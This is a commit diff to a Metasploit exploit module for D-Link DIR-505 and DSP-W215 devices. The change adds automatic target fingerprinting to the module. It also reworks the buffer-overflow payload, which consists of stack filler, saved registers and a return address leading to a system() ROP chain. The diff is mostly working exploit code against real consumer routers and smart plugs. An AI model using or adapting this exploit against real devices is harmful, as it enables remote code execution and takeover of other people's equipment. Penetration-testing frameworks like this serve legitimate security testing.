auto target included

modules/exploits/linux/http/dlink_hnap_rop.rb

@@ -35,6 +35,11 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'Targets'        =>
         [
+          #
+          # Automatic targeting via fingerprinting
+          #
+          [ 'Automatic Targeting', { 'auto' => true }  ],
+
           [ 'D-Link DSP-W215 - v1.0',
             {
               'Offset'  => 1000000,
@@ -65,11 +70,47 @@ class Metasploit3 < Msf::Exploit::Remote
         'method'  => 'GET'
       })
 
-      if res && [200, 301, 302].include?(res.code) && \
-         (res.body =~ /DIR-505/ && (res.body =~ /1.07/ || res.body =~ /1.06/)) || \
-         (res.body =~ /DSP-W215/ && (res.body =~ /1.00/))
-        print_good("#{peer} - detected a vulnerable device")
-        return Exploit::CheckCode::Detected
+      if res && [200, 301, 302].include?(res.code)
+
+        if (target['auto'])
+          if res.body =~ /DIR-505/ && res.body =~ /1.07/
+
+            self.targets.each do |t|
+              if (t.name =~ /DIR-505.*1.07/) then
+                @mytarget = t
+                break
+              end
+            end
+            print_status("Selected Target: #{@mytarget.name}")
+
+          elsif res.body =~ /DIR-505/ && res.body =~ /1.06/
+
+            self.targets.each do |t|
+              if (t.name =~ /DIR-505.*1.06/) then
+                @mytarget = t
+                break
+              end
+            end
+            print_status("Selected Target: #{@mytarget.name}")
+
+          elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/
+
+            self.targets.each do |t|
+              if (t.name =~ /DSP-W215.*1.00/) then
+                @mytarget = t
+                break
+              end
+            end
+            print_status("Selected Target: #{@mytarget.name}")
+          end
+
+          print_good("#{peer} - detected a vulnerable device")
+          return Exploit::CheckCode::Detected
+
+        else
+          print_good("#{peer} - detected a device with unknown exploitability")
+          return Exploit::CheckCode::Detected
+        end
       end
     rescue ::Rex::ConnectionError
       return Exploit::CheckCode::Unknown
@@ -78,9 +119,17 @@ class Metasploit3 < Msf::Exploit::Remote
     Exploit::CheckCode::Unknown
   end
 
+  def target
+    return @mytarget if @mytarget
+    super
+  end
+
   def exploit
     print_status("#{peer} - Trying to access the vulnerable URL...")
 
+    # Use a copy of the target
+    @mytarget = target
+
     unless check == Exploit::CheckCode::Detected
       fail_with(Failure::Unknown, "#{peer} - Failed to detect a vulnerable device")
     end
@@ -93,13 +142,13 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def prepare_shellcode(cmd)
-    buf = rand_text_alpha_upper(target['Offset'])   # Stack filler
-    buf << rand_text_alpha_upper(4)                 # $s0, don't care
-    buf << rand_text_alpha_upper(4)                 # $s1, don't care
-    buf << rand_text_alpha_upper(4)                 # $s2, don't care
-    buf << rand_text_alpha_upper(4)                 # $s3, don't care
-    buf << rand_text_alpha_upper(4)                 # $s4, don't care
-    buf << target['Ret']                            # $ra
+    buf = rand_text_alpha_upper(@mytarget['Offset'])   # Stack filler
+    buf << rand_text_alpha_upper(4)                    # $s0, don't care
+    buf << rand_text_alpha_upper(4)                    # $s1, don't care
+    buf << rand_text_alpha_upper(4)                    # $s2, don't care
+    buf << rand_text_alpha_upper(4)                    # $s3, don't care
+    buf << rand_text_alpha_upper(4)                    # $s4, don't care
+    buf << @mytarget['Ret']                            # $ra
 
            # la $t9, system
            # la $s1, 0x440000